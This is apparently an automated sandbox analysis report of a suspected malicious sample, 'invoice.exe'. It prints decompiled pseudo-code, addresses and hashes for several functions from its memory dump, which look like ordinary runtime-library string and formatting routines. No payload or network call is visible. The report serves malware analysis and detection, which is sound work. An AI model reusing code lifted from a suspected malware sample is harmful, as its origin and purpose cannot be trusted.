                                            			E00303EC0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v116;
				intOrPtr _v120;
				char _v126;
				char _v127;
				long _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _t51;
				intOrPtr _t52;
				signed int _t55;
				short* _t56;
				int _t60;
				signed int _t64;
				intOrPtr _t66;
				signed int _t68;
				char _t70;
				intOrPtr _t72;
				signed char _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t88;
				intOrPtr _t92;
				void* _t94;
				signed int _t95;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t101;

				_t51 = _a16;
				_v120 = __ecx;
				_t75 =  *((intOrPtr*)(_t51 + 0x1c));
				_t79 =  *((intOrPtr*)(_t51 + 0x18));
				_t88 = _t75;
				if(_t88 > 0) {
					L8:
					_t52 = 0x24;
					_v136 = 0x24;
					L10:
					asm("movsd xmm0, [ebp+0x1c]");
					asm("cdq");
					_t80 = _t79 - _t52;
					asm("sbb edi, edx");
					_t72 = 0;
					_t66 = 0;
					_v140 = 0;
					_t55 =  *(_a16 + 0x14) & 0x00003000;
					_v132 = 0;
					_t94 = _t55 - 0x2000;
					if(_t94 != 0) {
						L31:
						_t76 = _a16;
						_t56 =  &_v127;
						_v128 = 0x25;
						_t73 =  *(_a16 + 0x14);
						if((_t73 & 0x00000020) != 0) {
							_v127 = 0x2b;
							_t56 =  &_v126;
						}
						if((_t73 & 0x00000010) != 0) {
							 *_t56 = 0x23;
							_t56 = _t56 + 1;
						}
						 *_t56 = 0x2a2e;
						_t68 = _t73 & 0x00003000;
						 *((char*)(_t56 + 2)) = 0x4c;
						if((_t73 & 0x00000004) == 0) {
							if(_t68 != 0x2000) {
								if(_t68 != 0x3000) {
									_t70 = 0x65 + (_t68 & 0xffffff00 | _t68 != 0x00001000) * 2;
								} else {
									_t70 = 0x61;
								}
								goto L45;
							}
							goto L41;
						} else {
							if(_t68 == 0x2000) {
								L41:
								_t70 = 0x66;
								L45:
								 *((char*)(_t56 + 3)) = _t70;
								asm("movsd [esp], xmm0");
								 *((char*)(_t56 + 4)) = 0;
								_t60 = swprintf( &_v116, 0x6c,  &_v128, _v136);
								_t81 = _a4;
								E003055B0(_v120, _t81, _a8, _a12, _t76, _a20,  &_v116, _v140, _v132, _t80, _t60);
								return _t81;
							}
							if(_t68 != 0x3000) {
								_t70 = 0x45 + (_t68 & 0xffffff00 | _t68 != 0x00001000) * 2;
							} else {
								_t70 = 0x41;
							}
							goto L45;
						}
					}
					asm("movsd xmm4, [0x32bc20]");
					asm("xorps xmm3, xmm3");
					asm("comisd xmm3, xmm0");
					_t64 = _t55 & 0xffffff00 | _t94 > 0x00000000;
					_t95 = _t64;
					if(_t95 != 0) {
						asm("xorpd xmm0, xmm4");
					}
					asm("movsd xmm1, [0x32bc18]");
					asm("comisd xmm0, xmm1");
					asm("movsd xmm2, [0x32bc10]");
					if(_t95 < 0) {
						L18:
						asm("comisd xmm0, xmm3");
						if(_t97 <= 0) {
							L29:
							if(_t64 != 0) {
								asm("xorpd xmm0, xmm4");
							}
							goto L31;
						}
						_t98 = _t75;
						if(_t98 < 0) {
							goto L29;
						}
						if(_t98 > 0) {
							L22:
							asm("movsd xmm1, [0x32bc00]");
							do {
								asm("comisd xmm1, xmm0");
								if(_t99 < 0 || _t66 >= 0x1388) {
									break;
								}
								_t80 = _t80 + 0xfffffff6;
								asm("mulsd xmm0, xmm2");
								asm("adc edi, 0xffffffff");
								_t66 = _t66 + 0xa;
								_t101 = _t75;
							} while (_t101 > 0 || _t101 >= 0 && _t80 >= 0xa);
							_v132 = _t66;
							goto L29;
						}
						_t99 = _t80 - 0xa;
						if(_t99 < 0) {
							goto L29;
						}
						goto L22;
					} else {
						while(_t72 < 0x1388) {
							asm("divsd xmm0, xmm2");
							_t72 = _t72 + 0xa;
							_t97 = _t72;
							asm("comisd xmm0, xmm1");
							if(_t97 >= 0) {
								continue;
							}
							break;
						}
						_v140 = _t72;
						goto L18;
					}
				}
				if(_t88 < 0 || _t79 == 0) {
					if(( *(_t51 + 0x14) & 0x00002000) == 0) {
						_t79 = 6;
						_t75 = 0;
					}
				}
				_t92 = _t75;
				if(_t92 < 0 || _t92 <= 0 && _t79 <= 0x24) {
					_t52 = _t79;
					_v136 = _t79;
					goto L10;
				} else {
					goto L8;
				}
			}


































                                            0x00303ecc
                                            0x00303ed1
                                            0x00303ed5
                                            0x00303ed8
                                            0x00303edb
                                            0x00303edd
                                            0x00303f00
                                            0x00303f00
                                            0x00303f05
                                            0x00303f11
                                            0x00303f11
                                            0x00303f16
                                            0x00303f17
                                            0x00303f1c
                                            0x00303f1e
                                            0x00303f20
                                            0x00303f22
                                            0x00303f29
                                            0x00303f2e
                                            0x00303f32
                                            0x00303f37
                                            0x00303fd4
                                            0x00303fd4
                                            0x00303fd7
                                            0x00303fdb
                                            0x00303fe0
                                            0x00303fe6
                                            0x00303fe8
                                            0x00303fed
                                            0x00303fed
                                            0x00303ff4
                                            0x00303ff6
                                            0x00303ff9
                                            0x00303ff9
                                            0x00303ffc
                                            0x00304001
                                            0x00304007
                                            0x0030400e
                                            0x0030403c
                                            0x00304048
                                            0x00304057
                                            0x0030404a
                                            0x0030404a
                                            0x0030404a
                                            0x00000000
                                            0x00304048
                                            0x00000000
                                            0x00304010
                                            0x00304016
                                            0x0030403e
                                            0x0030403e
                                            0x0030405e
                                            0x0030405e
                                            0x00304067
                                            0x0030406c
                                            0x0030407f
                                            0x0030408a
                                            0x003040a5
                                            0x003040b4
                                            0x003040b4
                                            0x0030401e
                                            0x0030402d
                                            0x00304020
                                            0x00304020
                                            0x00304020
                                            0x00000000
                                            0x0030401e
                                            0x0030400e
                                            0x00303f3d
                                            0x00303f45
                                            0x00303f48
                                            0x00303f4c
                                            0x00303f4f
                                            0x00303f51
                                            0x00303f53
                                            0x00303f53
                                            0x00303f57
                                            0x00303f5f
                                            0x00303f63
                                            0x00303f6b
                                            0x00303f89
                                            0x00303f89
                                            0x00303f8d
                                            0x00303fcc
                                            0x00303fce
                                            0x00303fd0
                                            0x00303fd0
                                            0x00000000
                                            0x00303fce
                                            0x00303f8f
                                            0x00303f91
                                            0x00000000
                                            0x00000000
                                            0x00303f93
                                            0x00303f9a
                                            0x00303f9a
                                            0x00303fa2
                                            0x00303fa2
                                            0x00303fa6
                                            0x00000000
                                            0x00000000
                                            0x00303fb0
                                            0x00303fb3
                                            0x00303fb7
                                            0x00303fba
                                            0x00303fbd
                                            0x00303fbd
                                            0x00303fc8
                                            0x00000000
                                            0x00303fc8
                                            0x00303f95
                                            0x00303f98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00303f70
                                            0x00303f70
                                            0x00303f78
                                            0x00303f7c
                                            0x00303f7c
                                            0x00303f7f
                                            0x00303f83
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00303f83
                                            0x00303f85
                                            0x00000000
                                            0x00303f85
                                            0x00303f6b
                                            0x00303edf
                                            0x00303eec
                                            0x00303eee
                                            0x00303ef3
                                            0x00303ef3
                                            0x00303eec
                                            0x00303ef5
                                            0x00303ef7
                                            0x00303f0b
                                            0x00303f0d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: swprintf
                                            • String ID: %$+
                                            • API String ID: 233258989-2626897407
                                            • Opcode ID: 8122beacd0709458c22584fd7e87c127ea50acbb84095a860cd7d35d92fb284d
                                            • Instruction ID: 8176c121adc314e8f6935102325d2c417ceb9cfbeb94cf73e7bac41566e1730e
                                            • Opcode Fuzzy Hash: 8122beacd0709458c22584fd7e87c127ea50acbb84095a860cd7d35d92fb284d
                                            • Instruction Fuzzy Hash: 215158728167068FDB27CF28C86075BBBADEF92390F158219F9556B2E1D730CA45C782
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00302C70, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 55%
                                            			E00302C70(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr* _a8, void _a12) {
				intOrPtr _v20;
				char _v24;
				void* __ebp;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t44;
				intOrPtr* _t50;
				intOrPtr _t51;
				intOrPtr* _t60;
				intOrPtr* _t64;
				char _t68;
				intOrPtr _t69;
				intOrPtr* _t80;
				void* _t90;

				_t50 = _a4;
				_t79 = __ecx;
				_t60 = _a8;
				_t68 =  *((intOrPtr*)(_t50 + 0x10));
				if(_t68 < _t60) {
					E0030999B(__eflags, "invalid string position");
					goto L25;
				} else {
					_t68 =  <  ? _a12 : _t68 - _t60;
					if(__ecx != _t50) {
						__eflags = _t68 - 0xfffffffe;
						if(__eflags > 0) {
							goto L26;
						} else {
							_t33 =  *((intOrPtr*)(__ecx + 0x14));
							__eflags = _t33 - _t68;
							if(_t33 >= _t68) {
								__eflags = _t68;
								if(_t68 != 0) {
									goto L9;
								} else {
									 *((intOrPtr*)(__ecx + 0x10)) = _t68;
									__eflags = _t33 - 0x10;
									if(_t33 < 0x10) {
										 *((char*)(__ecx)) = 0;
										return __ecx;
									} else {
										 *((char*)( *__ecx)) = 0;
										return __ecx;
									}
								}
							} else {
								E00306290(__ecx, _t68,  *((intOrPtr*)(__ecx + 0x10)));
								_t60 = _a8;
								__eflags = _t68;
								if(_t68 == 0) {
									L23:
									return _t79;
								} else {
									L9:
									__eflags =  *((intOrPtr*)(_t50 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t50 + 0x14)) >= 0x10) {
										_t50 =  *_t50;
									}
									__eflags =  *((intOrPtr*)(_t79 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t79 + 0x14)) < 0x10) {
										_t64 = _t79;
									} else {
										_t64 =  *_t79;
									}
									__eflags = _t68;
									if(_t68 != 0) {
										E0030EE10(_t64, _t50 + _t60, _t68);
									}
									__eflags =  *((intOrPtr*)(_t79 + 0x14)) - 0x10;
									 *((intOrPtr*)(_t79 + 0x10)) = _t68;
									if( *((intOrPtr*)(_t79 + 0x14)) < 0x10) {
										 *((char*)(_t79 + _t68)) = 0;
										goto L23;
									} else {
										 *((char*)( *_t79 + _t68)) = 0;
										return _t79;
									}
								}
							}
						}
					} else {
						_t44 = _t68 + _t60;
						if( *((intOrPtr*)(__ecx + 0x10)) < _t44) {
							L25:
							E0030999B(__eflags, "invalid string position");
							L26:
							_push("string too long");
							_t31 = E0030996D(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							__eflags = _v24;
							_push(_t79);
							_push(_t68);
							_t69 = _v20;
							_t80 = _t60;
							if(_v24 != 0) {
								__eflags =  *((intOrPtr*)(_t80 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t80 + 0x14)) >= 0x10) {
									_push(_t50);
									_t51 =  *_t80;
									__eflags = _t69;
									if(_t69 != 0) {
										E0030EE10(_t80, _t51, _t69);
										_t90 = _t90 + 0xc;
									}
									_t31 = L0030DF6A(_t51);
								}
							}
							 *((intOrPtr*)(_t80 + 0x10)) = _t69;
							 *((intOrPtr*)(_t80 + 0x14)) = 0xf;
							 *((char*)(_t69 + _t80)) = 0;
							return _t31;
						} else {
							 *((intOrPtr*)(__ecx + 0x10)) = _t44;
							if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
								_push(_t60);
								 *((char*)(__ecx + _t44)) = 0;
								E00304340(__ecx, 0);
								return __ecx;
							} else {
								_push(_t60);
								 *((char*)( *__ecx + _t44)) = 0;
								E00304340(__ecx, 0);
								return __ecx;
							}
						}
					}
				}
			}

















                                            0x00302c74
                                            0x00302c79
                                            0x00302c7b
                                            0x00302c7e
                                            0x00302c83
                                            0x00302d77
                                            0x00000000
                                            0x00302c89
                                            0x00302c8e
                                            0x00302c94
                                            0x00302cdd
                                            0x00302ce0
                                            0x00000000
                                            0x00302ce6
                                            0x00302ce6
                                            0x00302ce9
                                            0x00302ceb
                                            0x00302d11
                                            0x00302d13
                                            0x00000000
                                            0x00302d15
                                            0x00302d15
                                            0x00302d18
                                            0x00302d1b
                                            0x00302d30
                                            0x00302d34
                                            0x00302d1d
                                            0x00302d20
                                            0x00302d28
                                            0x00302d28
                                            0x00302d1b
                                            0x00302ced
                                            0x00302cf3
                                            0x00302cf8
                                            0x00302cfb
                                            0x00302cfd
                                            0x00302d69
                                            0x00302d6f
                                            0x00302cff
                                            0x00302cff
                                            0x00302cff
                                            0x00302d03
                                            0x00302d05
                                            0x00302d05
                                            0x00302d07
                                            0x00302d0b
                                            0x00302d37
                                            0x00302d0d
                                            0x00302d0d
                                            0x00302d0d
                                            0x00302d39
                                            0x00302d3b
                                            0x00302d43
                                            0x00302d48
                                            0x00302d4b
                                            0x00302d4f
                                            0x00302d52
                                            0x00302d65
                                            0x00000000
                                            0x00302d54
                                            0x00302d56
                                            0x00302d60
                                            0x00302d60
                                            0x00302d52
                                            0x00302cfd
                                            0x00302ceb
                                            0x00302c96
                                            0x00302c96
                                            0x00302c9c
                                            0x00302d7c
                                            0x00302d81
                                            0x00302d86
                                            0x00302d86
                                            0x00302d8b
                                            0x00302d90
                                            0x00302d91
                                            0x00302d92
                                            0x00302d93
                                            0x00302d94
                                            0x00302d95
                                            0x00302d96
                                            0x00302d97
                                            0x00302d98
                                            0x00302d99
                                            0x00302d9a
                                            0x00302d9b
                                            0x00302d9c
                                            0x00302d9d
                                            0x00302d9e
                                            0x00302d9f
                                            0x00302da3
                                            0x00302da7
                                            0x00302da8
                                            0x00302da9
                                            0x00302dac
                                            0x00302dae
                                            0x00302db0
                                            0x00302db4
                                            0x00302db6
                                            0x00302db7
                                            0x00302db9
                                            0x00302dbb
                                            0x00302dc0
                                            0x00302dc5
                                            0x00302dc5
                                            0x00302dc9
                                            0x00302dd1
                                            0x00302db4
                                            0x00302dd2
                                            0x00302dd5
                                            0x00302ddc
                                            0x00302de3
                                            0x00302ca2
                                            0x00302ca6
                                            0x00302ca9
                                            0x00302cc6
                                            0x00302ccb
                                            0x00302ccf
                                            0x00302cda
                                            0x00302cab
                                            0x00302cad
                                            0x00302cb2
                                            0x00302cb6
                                            0x00302cc1
                                            0x00302cc1
                                            0x00302ca9
                                            0x00302c9c
                                            0x00302c94

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 4104443479-4289949731
                                            • Opcode ID: 14a0fee5a12cf496db0a92b6260b030ed0e6614143fd3345c173ce5d18696b64
                                            • Instruction ID: 77d0be92cb119aaa7866b3dbc86486f535022221655b0d878f6d03e493a2047d
                                            • Opcode Fuzzy Hash: 14a0fee5a12cf496db0a92b6260b030ed0e6614143fd3345c173ce5d18696b64
                                            • Instruction Fuzzy Hash: 4531B2323023108BD7269E5CF8A4B5BF7A9EB90B21F100A2FE5558B6C5C7B19C4087A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00306180, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 69%
                                            			E00306180(signed int __eax, intOrPtr* __ecx, unsigned int _a4, unsigned int _a8, intOrPtr _a12) {
				char _v12;
				signed int _v20;
				void* _v25;
				intOrPtr* _v32;
				intOrPtr _v44;
				intOrPtr* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t47;
				intOrPtr* _t52;
				intOrPtr _t60;
				intOrPtr _t61;
				unsigned int _t76;
				unsigned int _t77;
				intOrPtr* _t79;
				unsigned int _t81;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr _t91;
				signed int _t93;
				intOrPtr* _t100;
				signed int _t103;
				intOrPtr _t104;

				_t89 = _a4;
				_t99 = __ecx;
				_t79 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t79 < _t89) {
					E0030999B(__eflags, "invalid string position");
					goto L24;
				} else {
					_t76 = _a8;
					if((__eax | 0xffffffff) - _t79 <= _t76) {
						L24:
						_push("string too long");
						E0030996D(__eflags);
						goto L25;
					} else {
						if(_t76 == 0) {
							L22:
							return _t99;
						} else {
							_push(_t91);
							_t91 = _t79 + _t76;
							if(_t91 > 0xfffffffe) {
								L25:
								_push("string too long");
								E0030996D(__eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(0xffffffff);
								_push(E00324690);
								_push( *[fs:0x0]);
								 *[fs:0x0] = _t103;
								_t104 = _t103 - 0x14;
								_push(_t76);
								_push(_t99);
								_push(_t91);
								_v44 = _t104;
								_t100 = _t79;
								_v56 = _t100;
								_t47 = _v20;
								_t93 = _t47 | 0x0000000f;
								__eflags = _t93 - 0xfffffffe;
								if(_t93 <= 0xfffffffe) {
									_t76 =  *(_t100 + 0x14);
									_t81 = _t76 >> 1;
									_t89 = 0xaaaaaaab * _t93 >> 0x20 >> 1;
									__eflags = _t81 - 0xaaaaaaab * _t93 >> 0x20 >> 1;
									if(_t81 > 0xaaaaaaab * _t93 >> 0x20 >> 1) {
										__eflags = _t76 - 0xfffffffe - _t81;
										_t93 = _t81 + _t76;
										if(_t76 > 0xfffffffe - _t81) {
											_t93 = 0xfffffffe;
										}
									}
								} else {
									_t93 = _t47;
								}
								_v12 = 0;
								_t30 = _t93 + 1; // 0xffffffff
								_v32 = E00307200(_t76, _t89, _t93, _t100, _t30);
								_v12 = 0xffffffff;
								_t77 = _a4;
								__eflags = _t77;
								if(_t77 != 0) {
									__eflags =  *(_t100 + 0x14) - 0x10;
									if( *(_t100 + 0x14) < 0x10) {
										_t84 = _t100;
									} else {
										_t84 =  *_t100;
									}
									__eflags = _t77;
									if(_t77 != 0) {
										E0030EE10(_t51, _t84, _t77);
										_t104 = _t104 + 0xc;
									}
								}
								__eflags =  *(_t100 + 0x14) - 0x10;
								if( *(_t100 + 0x14) >= 0x10) {
									L0030DF6A( *_t100);
								}
								 *_t100 = 0;
								_t52 = _v32;
								 *_t100 = _t52;
								 *(_t100 + 0x14) = _t93;
								 *((intOrPtr*)(_t100 + 0x10)) = _t77;
								__eflags = _t93 - 0x10;
								if(_t93 >= 0x10) {
									_t100 = _t52;
								}
								 *((char*)(_t100 + _t77)) = 0;
								 *[fs:0x0] = _v20;
								return _t52;
							} else {
								_t60 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t60 >= _t91) {
									__eflags = _t91;
									if(_t91 != 0) {
										goto L6;
									} else {
										 *((intOrPtr*)(__ecx + 0x10)) = _t91;
										__eflags = _t60 - 0x10;
										if(_t60 < 0x10) {
											 *((char*)(__ecx)) = 0;
											return __ecx;
										} else {
											 *((char*)( *__ecx)) = 0;
											return __ecx;
										}
									}
								} else {
									_push(_t79);
									_push(_t91);
									L26();
									_t89 = _a4;
									if(_t91 == 0) {
										L21:
										goto L22;
									} else {
										L6:
										_t61 =  *((intOrPtr*)(_t99 + 0x14));
										if(_t61 < 0x10) {
											_a8 = _t99;
										} else {
											_a8 =  *_t99;
										}
										if(_t61 < 0x10) {
											_t85 = _t99;
										} else {
											_t85 =  *_t99;
										}
										_t63 =  *((intOrPtr*)(_t99 + 0x10)) != _t89;
										if( *((intOrPtr*)(_t99 + 0x10)) != _t89) {
											E0030D480(_t85 + _t89 + _t76, _a8 + _t89, _t63);
											_t89 = _a4;
										}
										E003071B0(_t99, _t89, _t76, _a12);
										 *((intOrPtr*)(_t99 + 0x10)) = _t91;
										if( *((intOrPtr*)(_t99 + 0x14)) < 0x10) {
											 *((char*)(_t99 + _t91)) = 0;
											goto L21;
										} else {
											 *((char*)( *_t99 + _t91)) = 0;
											return _t99;
										}
									}
								}
							}
						}
					}
				}
			}




























                                            0x00306183
                                            0x00306188
                                            0x0030618a
                                            0x0030618f
                                            0x0030626f
                                            0x00000000
                                            0x00306195
                                            0x00306195
                                            0x0030619f
                                            0x00306274
                                            0x00306274
                                            0x00306279
                                            0x00000000
                                            0x003061a5
                                            0x003061a7
                                            0x00306262
                                            0x00306267
                                            0x003061ad
                                            0x003061ad
                                            0x003061ae
                                            0x003061b4
                                            0x0030627e
                                            0x0030627e
                                            0x00306283
                                            0x00306288
                                            0x00306289
                                            0x0030628a
                                            0x0030628b
                                            0x0030628c
                                            0x0030628d
                                            0x0030628e
                                            0x0030628f
                                            0x00306293
                                            0x00306295
                                            0x003062a0
                                            0x003062a1
                                            0x003062a8
                                            0x003062ab
                                            0x003062ac
                                            0x003062ad
                                            0x003062ae
                                            0x003062b1
                                            0x003062b3
                                            0x003062b6
                                            0x003062bb
                                            0x003062be
                                            0x003062c1
                                            0x003062c7
                                            0x003062cc
                                            0x003062d5
                                            0x003062d7
                                            0x003062d9
                                            0x003062e2
                                            0x003062e4
                                            0x003062e7
                                            0x003062e9
                                            0x003062e9
                                            0x003062e7
                                            0x003062c3
                                            0x003062c3
                                            0x003062c3
                                            0x003062ee
                                            0x003062f5
                                            0x00306301
                                            0x00306304
                                            0x00306344
                                            0x00306347
                                            0x00306349
                                            0x0030634b
                                            0x0030634f
                                            0x00306355
                                            0x00306351
                                            0x00306351
                                            0x00306351
                                            0x00306357
                                            0x00306359
                                            0x0030635e
                                            0x00306363
                                            0x00306363
                                            0x00306359
                                            0x00306366
                                            0x0030636a
                                            0x0030636e
                                            0x00306373
                                            0x00306376
                                            0x00306379
                                            0x0030637c
                                            0x0030637e
                                            0x00306381
                                            0x00306384
                                            0x00306387
                                            0x00306389
                                            0x00306389
                                            0x0030638b
                                            0x00306392
                                            0x0030639f
                                            0x003061ba
                                            0x003061ba
                                            0x003061bf
                                            0x003061e4
                                            0x003061e6
                                            0x00000000
                                            0x003061e8
                                            0x003061e8
                                            0x003061eb
                                            0x003061ee
                                            0x00306203
                                            0x00306207
                                            0x003061f0
                                            0x003061f3
                                            0x003061fb
                                            0x003061fb
                                            0x003061ee
                                            0x003061c1
                                            0x003061c1
                                            0x003061c2
                                            0x003061c5
                                            0x003061ca
                                            0x003061cf
                                            0x00306261
                                            0x00000000
                                            0x003061d5
                                            0x003061d5
                                            0x003061d5
                                            0x003061db
                                            0x0030620a
                                            0x003061dd
                                            0x003061df
                                            0x003061df
                                            0x00306210
                                            0x00306216
                                            0x00306212
                                            0x00306212
                                            0x00306212
                                            0x0030621b
                                            0x0030621d
                                            0x0030622c
                                            0x00306231
                                            0x00306234
                                            0x0030623e
                                            0x00306247
                                            0x0030624a
                                            0x0030625d
                                            0x00000000
                                            0x0030624c
                                            0x0030624e
                                            0x00306258
                                            0x00306258
                                            0x0030624a
                                            0x003061cf
                                            0x003061bf
                                            0x003061b4
                                            0x003061a7
                                            0x0030619f

                                            APIs
                                              • Part of subcall function 00306290: _memmove.LIBCMT ref: 0030635E
                                            • _memmove.LIBCMT ref: 0030622C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 4104443479-4289949731
                                            • Opcode ID: 8ac9a98f3dd182815e34b067265ce640c087b0711cc0bd14146e75a98681edab
                                            • Instruction ID: 456c32fd3175aca0e0af74aa6c5b3bbcc2091b0472bb209df36a0654b6870fa8
                                            • Opcode Fuzzy Hash: 8ac9a98f3dd182815e34b067265ce640c087b0711cc0bd14146e75a98681edab
                                            • Instruction Fuzzy Hash: C631EA323052149BD7269F5CD8A1A5EB7EDEF94750B204E2EF551CB2C6C771DC1087A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0030FCF8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0030FCF8() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x334b24;
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x334b24 = _t3;
				}
				_t4 = E00311C7D(_t3, 4);
				 *0x334b20 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x32e398;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x32e618) {
							break;
						}
						_t4 =  *0x334b20;
					}
					return 0;
				} else {
					 *0x334b24 = _t13;
					_t4 = E00311C7D(_t13, 4);
					 *0x334b20 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}









                                            0x0030fcf8
                                            0x0030fd00
                                            0x0030fd03
                                            0x0030fd0e
                                            0x0030fd10
                                            0x00000000
                                            0x0030fd10
                                            0x0030fd05
                                            0x0030fd05
                                            0x0030fd12
                                            0x0030fd12
                                            0x0030fd12
                                            0x0030fd1a
                                            0x0030fd1f
                                            0x0030fd28
                                            0x0030fd48
                                            0x0030fd48
                                            0x0030fd4a
                                            0x0030fd4f
                                            0x0030fd4f
                                            0x0030fd52
                                            0x0030fd55
                                            0x0030fd5e
                                            0x00000000
                                            0x00000000
                                            0x0030fd60
                                            0x0030fd60
                                            0x0030fd6a
                                            0x0030fd2a
                                            0x0030fd2d
                                            0x0030fd33
                                            0x0030fd38
                                            0x0030fd41
                                            0x00000000
                                            0x0030fd43
                                            0x0030fd45
                                            0x0030fd47
                                            0x0030fd47
                                            0x0030fd41

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __calloc_crt
                                            • String ID: ;3
                                            • API String ID: 3494438863-1148064220
                                            • Opcode ID: 8ef45223f5d2afe9a01e24cddecf844d7dbee3a1ff1334c5c34645fc2808306f
                                            • Instruction ID: 9a472df4e4a74c7b7665da0ac8836436c0ccdc87ecd4be0a9b7740745e74e6cd
                                            • Opcode Fuzzy Hash: 8ef45223f5d2afe9a01e24cddecf844d7dbee3a1ff1334c5c34645fc2808306f
                                            • Instruction Fuzzy Hash: 6DF062762466119FF73B9B18BCA1BA5B7D8EB58765F100036E200CEDD4E770E84197D8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: invoice.exe PID: 4284 Parent PID: 5872 invoice.exeCOMMON

                                            Executed Functions

                                            Function 00419FCB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
